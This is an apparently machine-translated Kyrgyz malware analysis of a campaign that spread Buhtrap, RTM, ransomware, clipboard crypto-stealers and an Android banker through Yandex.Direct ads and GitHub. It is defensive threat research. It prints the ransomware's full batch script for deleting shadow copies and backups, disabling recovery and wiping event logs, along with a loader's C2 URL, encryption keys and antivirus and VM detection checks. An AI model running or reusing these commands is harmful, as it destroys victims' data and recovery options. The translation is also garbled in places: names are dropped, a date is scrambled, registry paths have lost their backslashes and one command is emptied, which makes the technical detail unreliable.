Бухгалтерлерди киберчабуулга бутага алуу үчүн, алар интернетте издеген жумуш документтерин колдоно аласыз. Бул болжол менен кибер топтун акыркы бир нече айдын ичинде белгилүү бэкдорлорду таратып жатканы. и , ошондой эле криптовалюталарды уурдоо үчүн шифрлөөчүлөр жана программалык камсыздоо. Буталардын көбү Орусияда жайгашкан. Кол салуу Yandex.Direct сайтында зыяндуу жарнамаларды жайгаштыруу аркылуу ишке ашырылган. Потенциалдуу жабырлануучулар веб-сайтка багытталып, алардан документтин үлгүсү катары жашырылган зыяндуу файлды жүктөп алуу суралган. Биздин эскертүүдөн кийин Yandex зыяндуу жарнамаларды алып салды.
Бултраптын баштапкы коду мурда интернетте ачыкка чыгып кеткен, ошондуктан аны каалагандар колдоно алышат. Бизде RTM кодунун жеткиликтүүлүгү тууралуу маалымат жок.
Бул постто биз чабуулчулар Yandex.Direct аркылуу зыяндуу программаларды кантип таратып, аны GitHub сайтында жайгаштырганын айтып беребиз. Пост зыяндуу программанын техникалык анализи менен аяктайт.
Buhtrap жана RTM кайра ишке киришти
Жайылуунун механизми жана жабырлануучулар
Жабырлануучуларга жеткирилген ар кандай жүктөр жалпы жайылтуу механизмин бөлүшөт. Чабуулчулар тарабынан түзүлгөн бардык зыяндуу файлдар эки башка GitHub репозиторийлерине жайгаштырылган.
Адатта, репозиторийде тез-тез өзгөрүп туруучу бир жүктөлүп алынуучу зыяндуу файл бар. GitHub репозиторийдеги өзгөрүүлөрдүн тарыхын көрүүгө мүмкүнчүлүк бергендиктен, белгилүү бир мезгил ичинде кандай кесепеттүү программа таралганын көрө алабыз. Жабырлануучуну зыяндуу файлды жүктөп алууга көндүрүү үчүн, жогорудагы сүрөттө көрсөтүлгөн blanki-shabloni24[.]ru веб-сайты колдонулган.
Сайттын дизайны жана зыяндуу файлдардын бардык аталыштары бир концепцияга - формаларга, шаблондорго, контракттарга, үлгүлөргө ж.б. ылайык келет. Буга чейин Buhtrap жана RTM программалары бухгалтерлерге кол салууда колдонулганын эске алып, биз жаңы кампаниянын стратегиясы бирдей. Жабырлануучу кол салгандардын сайтына кантип кирип калганы бир гана суроо.
Инфекция
Бул сайтка кирген жок дегенде бир нече потенциалдуу жабырлануучулар зыяндуу жарнамага тартылышкан. Төмөндө мисал URL болуп саналат:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Шилтемеден көрүнүп тургандай, баннер bb.f2[.]kz мыйзамдуу бухгалтердик форумга жайгаштырылган. Белгилей кетчү нерсе, баннерлер ар кандай сайттарда пайда болуп, бардыгынын идентификатору бирдей болгон (blanki_rsya) жана көбү бухгалтердик эсепке же юридикалык жардам көрсөтүү кызматтарына тиешелүү. URL дареги потенциалдуу жабырлануучу "эсеп-фактуранын формасын жүктөп алуу" өтүнүчүн колдонгонун көрсөтүп турат, бул биздин максаттуу чабуулдар жөнүндөгү гипотезаны колдойт. Төмөндө баннерлер пайда болгон сайттар жана тиешелүү издөө сурамдары бар.
- эсеп-фактура формасын жүктөп алуу – bb.f2[.]kz
- келишимдин үлгүсү - Ipopen[.]ru
- арыз даттануу үлгүсү - 77metrov[.]ru
- келишим формасы - blank-dogovor-kupli-prodazhi[.]ru
- соттун арызынын үлгүсү - zen.yandex[.]ru
- арыздын үлгүсү - yurday[.]ru
- үлгү келишим формалары – Regforum[.]ru
- келишим формасы – assistentus[.]ru
- батир келишиминин үлгүсү – napravah[.]com
- юридикалык келишимдердин үлгүлөрү - avito[.]ru
blanki-shabloni24[.]ru сайты жөнөкөй визуалдык баа берүү үчүн конфигурацияланган болушу мүмкүн. Адатта, GitHub шилтемеси бар профессионалдуу сайтты көрсөткөн жарнама, албетте, жаман нерседей көрүнбөйт. Мындан тышкары, чабуулчулар зыяндуу файлдарды репозиторийге чектелген мөөнөткө гана жүктөшкөн, кыязы, кампания учурунда. Көпчүлүк учурда, GitHub репозиторийинде бош zip архиви же бош EXE файлы бар. Ошентип, чабуулчулар атайын издөө сурамдарына жооп катары келген бухгалтерлер кирген сайттарда Yandex.Direct аркылуу жарнамаларды тарата алышкан.
Андан кийин, келгиле, ушундай жол менен бөлүштүрүлгөн ар кандай пайдалуу жүктөрдү карап көрөлү.
Жүктөмдүн анализи
Бөлүштүрүү хронологиясы
Зыяндуу кампания 2018-жылдын октябрынын аягында башталып, жазуу учурунда активдүү. Бардык репозиторий GitHub'та жалпыга жеткиликтүү болгондуктан, биз алты түрдүү зыяндуу программалык камсыздоо үй-бүлөлөрүнүн бөлүштүрүлүшүнүн так хронологиясын түздүк (төмөндөгү сүрөттү караңыз). Гит тарыхы менен салыштыруу үчүн ESET телеметриясы менен өлчөнгөн баннер шилтемеси качан табылганын көрсөткөн сызыкты коштук. Көрүнүп тургандай, бул GitHubдагы пайдалуу жүктүн болушу менен жакшы байланышта. Февраль айынын аягындагы дал келбөөчүлүктү бизде өзгөртүү тарыхынын бир бөлүгү болбогондугу менен түшүндүрсө болот, анткени репозиторий GitHub'дан биз аны толук ала электе өчүрүлгөн.
Сүрөт 1. Зыяндуу программаларды таратуунун хронологиясы.
Кодго кол коюу сертификаттары
Кампания бир нече сертификаттарды колдонгон. Айрымдарына бирден ашык зыяндуу программа үй-бүлөсү кол койгон, бул дагы ар кандай үлгүлөр бир кампанияга таандык экенин көрсөтүп турат. Купуя ачкычтын болушуна карабастан, операторлор системалуу түрдө экиликке кол коюшкан эмес жана бардык үлгүлөр үчүн ачкычты колдонушкан эмес. 2019-жылдын февраль айынын аягында чабуулчулар жеке ачкычы жок Google компаниясына таандык сертификат аркылуу жараксыз кол тамгаларды түзө башташты.
Кампанияга катышкан бардык сертификаттар жана алар кол койгон зыяндуу программалардын үй-бүлөлөрү төмөнкү таблицада келтирилген.
Биз ошондой эле бул кодго кол коюу сертификаттарын башка кесепеттүү программалардын үй-бүлөлөрү менен байланыш түзүү үчүн колдондук. Көпчүлүк сертификаттар үчүн биз GitHub репозиторийинде таратылбаган үлгүлөрдү таба алган жокпуз. Бирок, TOV "MARIA" сертификаты ботнеттерге таандык зыяндуу программаларга кол коюу үчүн колдонулган , жарнамалык программалар жана шахтерлор. Бул зыяндуу программанын бул кампанияга байланыштуу болушу күмөн. Сыягы, күбөлүк darknetтен сатылып алынган.
Win32/Filecoder.Buhtrap
Биздин көңүлүбүздү бурган биринчи компонент жаңы ачылган Win32/Filecoder.Buhtrap болду. Бул кээде пакеттелген Delphi бинардык файлы. Ал негизинен 2019-жылдын февраль-март айларында таратылган. Ал ransomware программасына ылайыктуу иш кылат - ал жергиликтүү дисктерди жана тармактык папкаларды издейт жана табылган файлдарды шифрлейт. Ал шифрлөө ачкычтарын жөнөтүү үчүн сервер менен байланышпагандыктан, бузулуу үчүн Интернет байланышынын кереги жок. Анын ордуна, ал кун кабарынын аягына "токен" кошот жана операторлор менен байланышуу үчүн электрондук почтаны же Bitmessageди колдонууну сунуштайт.
Мүмкүн болушунча көптөгөн сезимтал ресурстарды шифрлөө үчүн, Filecoder.Buhtrap шифрлөөгө тоскоол боло турган баалуу маалыматты камтыган ачык файл иштеткичтери болушу мүмкүн болгон негизги программалык камсыздоону өчүрүүгө арналган жипти иштетет. Максаттуу процесстер негизинен маалымат базасын башкаруу системалары (DBMS). Мындан тышкары, Filecoder.Buhtrap маалыматтарды калыбына келтирүү кыйын болушу үчүн журнал файлдарын жана камдык жок кылат. Бул үчүн, төмөнкү пакеттик скриптти иштетиңиз.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap веб-сайтка келгендер жөнүндө маалымат чогултуу үчүн иштелип чыккан мыйзамдуу онлайн IP Logger кызматын колдонот. Бул ransomware курмандыктарын көзөмөлдөө үчүн арналган, бул буйрук сабынын жоопкерчилиги:
mshta.exe "javascript:document.write('');"
Шифрлөө үчүн файлдар үч алып салуу тизмесине дал келбесе тандалат. Биринчиден, төмөнкү кеңейтүүлөрү бар файлдар шифрленген эмес: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys жана .bat. Экинчиден, толук жол төмөндөгү тизмеден каталог саптарын камтыган бардык файлдар алынып салынат.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Үчүнчүдөн, кээ бир файл аттары да шифрлөөдөн чыгарылат, алардын арасында кун кабарынын файл аталышы да бар. Тизме төмөндө келтирилген. Албетте, бул өзгөчөлүктөрдүн баары машинанын иштешин камсыз кылуу үчүн арналган, бирок минималдуу жарактуулук менен.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Файлды шифрлөө схемасы
Аткарылгандан кийин кесепеттүү программа 512 биттик RSA ачкыч жуптарын жаратат. Жеке көрсөткүч (d) жана модулу (n) андан кийин катуу коддолгон 2048 биттик ачык ачкыч (ачык көрсөткүч жана модулу), zlib-пакеттелген жана base64 коддолушу менен шифрленет. Бул үчүн жооптуу код 2-сүрөттө көрсөтүлгөн.
2-сүрөт. 512-бит RSA ачкыч жуптарын түзүү процессинин Hex-Rays декомпиляциясынын натыйжасы.
Төмөндө түзүлгөн купуя ачкыч менен жөнөкөй тексттин мисалы келтирилген, ал кун билдирүүсүнө тиркелген белги болуп саналат.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Чабуулчулардын ачык ачкычы төмөндө келтирилген.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Файлдар 128 биттик ачкыч менен AES-256-CBC аркылуу шифрленген. Ар бир шифрленген файл үчүн жаңы ачкыч жана жаңы инициализация вектору түзүлөт. Негизги маалымат шифрленген файлдын аягына кошулат. Шифрленген файлдын форматын карап көрөлү.
Шифрленген файлдардын төмөнкү аталышы бар:
VEGA сыйкырдуу маанисин кошуу менен баштапкы файл маалыматтары биринчи 0x5000 байтка чейин шифрленген. Бардык чечмелөө маалыматы төмөнкү түзүлүштөгү файлга тиркелет:
- Файлдын өлчөмү маркеринде файлдын өлчөмү 0x5000 байттан чоңураак экендигин көрсөткөн белги бар
— AES ачкычы blob = ZlibCompress(RSAEncrypt(AES ачкычы + IV, түзүлгөн RSA ачкыч жупунун ачык ачкычы))
- RSA ачкычы blob = ZlibCompress(RSAEncrypt (түзүлгөн RSA купуя ачкычы, катуу коддолгон RSA ачык ачкычы))
Win32/ClipBanker
Win32/ClipBanker - бул 2018-жылдын октябрынын аягынан декабрдын башына чейин үзгүлтүксүз таратылган компонент. Анын ролу алмашуу буферинин мазмунуна мониторинг жүргүзүү болуп саналат, ал cryptocurrency капчыктардын даректерин издейт. Максаттуу капчык дарегин аныктагандан кийин, ClipBanker аны операторлорго таандык деп эсептелген дарек менен алмаштырат. Биз изилдеген үлгүлөр кутучага салынган да, бүдөмүк да болгон эмес. жүрүм-турумун маска үчүн колдонулган жалгыз механизм сап шифрлөө болуп саналат. Оператор капчык даректери RC4 аркылуу шифрленген. Максаттуу криптовалюталар - Bitcoin, Bitcoin cash, Dogecoin, Ethereum жана Ripple.
Кесепеттүү программа чабуулчулардын Bitcoin капчыктарына жайылып жаткан мезгилде VTSке аз сумма жөнөтүлгөн, бул кампаниянын ийгилигинен күмөн туудурат. Кошумчалай кетсек, бул транзакциялар такыр ClipBanker менен байланышкан деп айтууга эч кандай далил жок.
Win32/RTM
Win32/RTM компоненти 2019-жылдын март айынын башында бир нече күнгө таратылган. RTM алыскы банк тутумдарына багытталган Delphi тилинде жазылган трояндык банкир. 2017-жылы ESET изилдөөчүлөрү жарыяланган Бул программанын сыпаттамасы дагы эле актуалдуу. 2019-жылдын январында Palo Alto Networks да чыгарды .
Buhtrap Loader
Бир нече убакыт бою GitHub'да мурунку Buhtrap куралдарына окшош эмес жүктөөчү бар болчу. Ал кайрылат https://94.100.18[.]67/RSS.php?<some_id> кийинки этапты алуу жана аны түздөн-түз эс тутумга жүктөө үчүн. Экинчи баскычтагы коддун эки жүрүм-турумун айырмалай алабыз. Биринчи URL дарегинде RSS.php түздөн-түз Buhtrap бэкдорунан өттү - бул бэкдор булак коду ачыкка чыккандан кийин жеткиликтүү болгонго абдан окшош.
Кызыктуусу, биз Buhtrap бэкдоору менен бир нече кампанияларды көрүп жатабыз жана алар ар кандай операторлор тарабынан башкарылат имиш. Бул учурда, негизги айырма - бэкдор түздөн-түз эс тутумга жүктөлөт жана биз айткан DLL жайылтуу процесси менен кадимки схеманы колдонбойт. . Мындан тышкары, операторлор C&C серверине тармактык трафикти шифрлөө үчүн колдонулган RC4 ачкычын өзгөртүштү. Биз көргөн кампаниялардын көбүндө операторлор бул ачкычты өзгөртүүгө убара болгон эмес.
Экинчи, татаалыраак жүрүм-турум RSS.php URL башка жүктөгүчкө өткөрүлүп берилди. Ал динамикалык импорт таблицасын кайра куруу сыяктуу кээ бир бүдөмүк иштерди ишке ашырды. Жүктөөчүнүн максаты - C&C сервери менен байланышуу [.]com/api/F27F84EDA4D13B15/2, журналдарды жөнөтүп, жооп күтүңүз. Ал жоопту блоб катары иштетип, аны эс тутумга жүктөйт жана аны аткарат. Бул жүктөгүчтү аткарып жатканда биз көргөн пайдалуу жүк ошол эле Buhtrap бэкдору болгон, бирок башка компоненттер болушу мүмкүн.
Android/Spy.Banker
Кызыгы, GitHub репозиторийинде Android үчүн компонент да табылган. Ал негизги филиалда бир гана күн болгон - 1-жылдын 2018-ноябрында. GitHub сайтында жайгаштырылгандан тышкары, ESET телеметриясы бул кесепеттүү программанын таркатылышына эч кандай далил таба албайт.
Компонент Android Колдонмо пакети (APK) катары жайгаштырылган. Бул абдан бүдөмүк. Зыяндуу аракет APKде жайгашкан шифрленген JAR ичинде жашырылган. Бул ачкычты колдонуу менен RC4 менен шифрленген:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Ошол эле ачкыч жана алгоритм саптарды шифрлөө үчүн колдонулат. JAR жайгашкан APK_ROOT + image/files. Файлдын биринчи 4 байты шифрленген JARдын узундугун камтыйт, ал узундук талаасынан кийин дароо башталат.
Файлдын шифрин чечип, биз анын мурда Анубис экенин билдик Android үчүн банкир. Кесепеттүү программа төмөнкү өзгөчөлүктөргө ээ:
- микрофон жаздыруу
- скриншотторду алуу
- GPS координаттарын алуу
- келоггер
- түзмөк маалыматтарын шифрлөө жана кун талап кылуу
- спам жөнөтүү
Кызыгы, банкир башка C&C серверин алуу үчүн Twitterди резервдик байланыш каналы катары колдонгон. Биз анализдеген үлгү @JonesTrader эсебин колдонгон, бирок талдоо учурунда ал бөгөттөлгөн.
Банкир Android түзмөктө максаттуу колдонмолордун тизмесин камтыйт. Бул Sophos изилдөөсүндө алынган тизмеден узунураак. Тизмеге көптөгөн банктык тиркемелер, Amazon жана eBay сыяктуу онлайн соода программалары жана криптовалюталык кызматтар кирет.
MSIL/ClipBanker.IH
Бул кампаниянын бир бөлүгү катары таратылган акыркы компонент 2019-жылдын мартында пайда болгон .NET Windows аткарылуучу программасы болгон. Изилденген версиялардын көбү ConfuserEx v1.0.0 менен пакеттелген. ClipBanker сыяктуу, бул компонент алмашуу буферин колдонот. Анын максаты криптовалюталардын кеңири спектри, ошондой эле Steam боюнча сунуштар. Андан тышкары, ал Bitcoin жеке WIF ачкычын уурдоо үчүн IP Logger кызматын колдонот.
Коргоо механизмдери
ConfuserEx мүчүлүштүктөрдү оңдоону, демпингди жана бурмалоону алдын алууда берген артыкчылыктардан тышкары, компонент антивирустук өнүмдөрдү жана виртуалдык машиналарды аныктоо мүмкүнчүлүгүн камтыйт.
Анын виртуалдык машинада иштеп жатканын текшерүү үчүн зыяндуу программа Windows WMI буйрук сабын (WMIC) BIOS маалыматын талап кылуу үчүн колдонот, атап айтканда:
wmic bios
Андан кийин программа буйрук чыгарууну талдайт жана ачкыч сөздөрдү издейт: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Вируска каршы өнүмдөрдү аныктоо үчүн, кесепеттүү программа Windows Коопсуздук борборуна Windows башкаруу куралдарын (WMI) өтүнүчүн жөнөтөт ManagementObjectSearcher API төмөндө көрсөтүлгөндөй. base64 коддон кийин чакыруу төмөнкүдөй болот:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
3-сүрөт. Антивирустук продуктуларды идентификациялоо процесси.
Мындан тышкары, зыяндуу программа текшерет , алмашуу буферинин чабуулдарынан коргоо куралы жана эгер иштеп жатса, ошол процесстеги бардык жиптерди токтотуп, ошону менен коргоону өчүрөт.
Туруктуулук
Биз изилдеген зыяндуу программанын версиясы өзүнөн өзү көчүрүлөт %APPDATA%googleupdater.exe жана google каталогу үчүн "жашыруун" атрибутун орнотот. Андан кийин ал бааны өзгөртөт SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows реестринде жана жолду кошот updater.exe. Ошентип, зыяндуу программа колдонуучу кирген сайын аткарылат.
Зыяндуу жүрүм-турум
ClipBanker сыяктуу, кесепеттүү программа алмашуу буферинин мазмунун көзөмөлдөйт жана cryptocurrency капчык даректерин издейт жана табылганда аны оператордун даректеринин бирине алмаштырат. Төмөндө коддо табылгандардын негизинде максаттуу даректердин тизмеси келтирилген.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Даректин ар бир түрү үчүн тиешелүү регулярдуу туюнтма бар. STEAM_URL мааниси буферде аныктоо үчүн колдонулган кадимки туюнтмадан көрүнүп тургандай, Steam тутумуна кол салуу үчүн колдонулат:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Эксфильтрация каналы
Буфердеги даректерди алмаштыруудан тышкары, кесепеттүү программа Bitcoin, Bitcoin Core жана Electrum Bitcoin капчыктарынын жеке WIF ачкычтарын бутага алат. Программа WIF купуя ачкычын алуу үчүн plogger.org сайтын эксфильтрация каналы катары колдонот. Бул үчүн операторлор төмөндө көрсөтүлгөндөй, User-Agent HTTP башына купуя ачкыч дайындарын кошот.
Сүрөт 4. Чыгуу маалыматтары менен IP Logger консолу.
Операторлор капчыктарды эксфильтрациялоо үчүн iplogger.org сайтын колдонушкан эмес. Алар талаадагы 255 белги чегинен улам башка ыкмага кайрылышкандыр User-AgentIP Logger веб интерфейсинде көрсөтүлөт. Биз изилдеген үлгүлөрдөгү башка чыгаруу сервери чөйрө өзгөрмөсүндө сакталган DiscordWebHook. Таң калыштуусу, бул чөйрө өзгөрмөсү коддун эч бир жеринде дайындалган эмес. Бул кесепеттүү программа дагы эле иштелип жатканын жана өзгөрмө оператордун сыноочу машинасына дайындалганын көрсөтүп турат.
Программанын иштеп жаткандыгынын дагы бир белгиси бар. Бинардык файл эки iplogger.org URL'ин камтыйт жана экөө тең маалыматтар эксфильтрацияланганда суралат. Бул URL даректеринин бирине суроо-талапта, Referer талаасындагы маани "DEV /" алдында турат. Ошондой эле ConfuserEx аркылуу пакеттелбеген версиясын таптык, бул URL үчүн алуучу DevFeedbackUrl деп аталат. Айлана-чөйрөнүн өзгөрмөлөрүнүн аталышына таянып, биз операторлор криптовалюталык капчыктарды уурдоо үчүн мыйзамдуу Discord кызматын жана анын веб-кармоо системасын колдонууну пландап жатышат деп ишенебиз.
жыйынтыктоо
Бул кампания кибер чабуулдарда мыйзамдуу жарнамалык кызматтарды колдонуунун мисалы болуп саналат. Схема россиялык уюмдарга багытталган, бирок орусиялык эмес кызматтарды колдонгон мындай чабуулду көрүп таң калбайбыз. Компромисске барбаш үчүн, колдонуучулар жүктөп алган программалык камсыздоонун булагынын аброюна ишениши керек.
Компромисстин индикаторлорунун толук тизмеси жана MITER ATT&CK атрибуттары төмөнкү даректе жеткиликтүү .
Source: www.habr.com